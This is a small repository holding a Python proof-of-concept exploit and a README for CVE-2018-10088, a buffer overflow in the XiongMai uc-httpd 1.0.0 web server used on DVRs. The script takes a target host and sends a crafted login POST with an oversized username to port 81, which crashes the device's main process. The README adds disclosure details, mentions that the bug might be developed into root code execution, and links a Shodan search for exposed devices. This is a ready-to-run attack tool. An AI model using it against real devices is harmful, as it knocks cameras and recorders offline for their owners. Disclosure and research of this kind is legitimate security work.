├── LICENSE
├── 0dayPoC.py
└── README.md


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2018 bitfu
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/0dayPoC.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | #######################################################################################
 4 | #
 5 | #     Exploit Title: XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit
 6 | #              Date: 08/06/2018
 7 | #     Vendor Status: Informed (17/02/2018)
 8 | #            CVE ID: CVE-2018-10088
 9 | #    Exploit Author: Andrew Watson
10 | #           Contact: https://keybase.io/bitfu
11 | #  Software Version: XiongMai uc-httpd 1.0.0
12 | #   Vendor Homepage: http://www.xiongmaitech.com/en/
13 | #         Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP/81
14 | #       PoC Details: Payload requires a minimum length of 85
15 | #        References: https://github.com/bitfu/uc-httpd-1.0.0-buffer-overflow-exploit
16 | #                    https://www.shodan.io/search?query=uc-httpd+1.0.0
17 | #
18 | #        DISCLAIMER: This proof of concept is provided for educational purposes only!
19 | #              
20 | #######################################################################################
21 | 
22 | 
23 | import socket
24 | import sys
25 | 
26 | payload="A" * 85
27 | 
28 | print "\n###############################################"
29 | print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit"
30 | 
31 | if len(sys.argv) < 2:
32 |     print "\nUsage: " + sys.argv[0] + " <Host>\n"
33 |     sys.exit()
34 | 
35 | print "\nTarget: " + sys.argv[1]
36 | print "Sending exploit..."
37 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
38 | s.connect((sys.argv[1],81))
39 | s.send('POST /login.htm HTTP/1.1\r\n')
40 | s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n')
41 | s.recv(1024)
42 | s.close()
43 | print "\nExploit complete!"
44 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # uc-httpd-1.0.0-buffer-overflow-exploit
 2 | 
 3 | [XiongMai uc-httpd 1.0.0 buffer overflow exploit proof of concept] <br>
 4 | 
 5 | Proof of Concept code: 0dayPoC.py <br><br>
 6 | 
 7 | CVE-2018-10088 <br>
 8 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10088 
 9 | 
10 | 
11 | Thanks to the CVE Assignment Team for their help structuring the following:
12 | 
13 | [Description] <br>
14 | Buffer overflow in XiongMai uc-httpd 1.0.0 allows unauthenticated
15 | attackers to execute Denial of Service remotely,
16 | or possibly have unspecified other impact,
17 | via a Web camera viewer interface, a different vulnerability than CVE-2017-16725.
18 | 
19 | ------------------------------------------
20 | 
21 | [Additional Information] <br>
22 | Potential for development into full RCE with root permissions as the
23 | Sofia process runs as root on the DVR tested. The vulnerability could
24 | potentially affect hundreds of thousands of DVR's according to
25 | Shodan.io
26 | 
27 | ------------------------------------------
28 | 
29 | [Vulnerability Type] <br>
30 | Buffer Overflow
31 | 
32 | ------------------------------------------
33 | 
34 | [Vendor of Product] <br>
35 | Xiongmai Technology
36 | 
37 | ------------------------------------------
38 | 
39 | [Affected Product Code Base] <br>
40 | xiongmai uc-httpd - 1.0.0
41 | 
42 | ------------------------------------------
43 | 
44 | [Affected Component] <br>
45 | Currently the PoC leads to Denial of Service by crashing the process (Sofia) that runs multiple services on the DVR, 
46 | including the uc-httpd web server.
47 | 
48 | ------------------------------------------
49 | 
50 | [Attack Type] <br>
51 | Remote
52 | 
53 | ------------------------------------------
54 | 
55 | [Impact Denial of Service] <br>
56 | True
57 | 
58 | ------------------------------------------
59 | 
60 | [Attack Vectors] <br>
61 | Sending a crafted HTTP POST request via the Web camera viewer login form at https://www.shodan.io/search?query=uc-httpd+1.0.0
62 | 
63 | ------------------------------------------
64 | 
65 | [Reference] <br>
66 | https://github.com/bitfu/uc-httpd-1.0.0-buffer-overflow-exploit
67 | 
68 | ------------------------------------------
69 | 
70 | [Discoverer] <br>
71 | Andrew Watson <br>
72 | Contact: https://keybase.io/bitfu
73 | 


--------------------------------------------------------------------------------